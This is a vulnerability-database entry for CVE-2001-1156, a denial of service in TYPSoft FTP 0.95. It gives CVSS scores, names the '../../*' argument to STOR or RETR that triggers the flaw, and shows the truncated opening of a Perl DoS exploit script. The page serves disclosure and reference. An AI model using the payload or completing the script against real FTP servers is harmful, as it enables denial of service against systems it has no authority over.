5
CVSSv2

CVE-2001-1156

Published: 08/10/2001 Updated: 05/09/2008
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

TYPSoft FTP 0.95 allows remote malicious users to cause a denial of service (CPU consumption) via a "../../*" argument to (1) STOR or (2) RETR.

Vulnerable Product Search on Vulmon Subscribe to Product

typsoft typsoft ftp server 0.95

Exploits

#!/usr/bin/perl use IO::Socket; use Socket; print "\n-= TYPSoft FTP Server <= v111 DOS =-\n"; print "-= wood (at) Exploitlabscom =-\n\n"; if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-111-DOSpl <host> <user> <pass> [port]\n" }; if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" }; $adr = $ARGV[0]; $ ...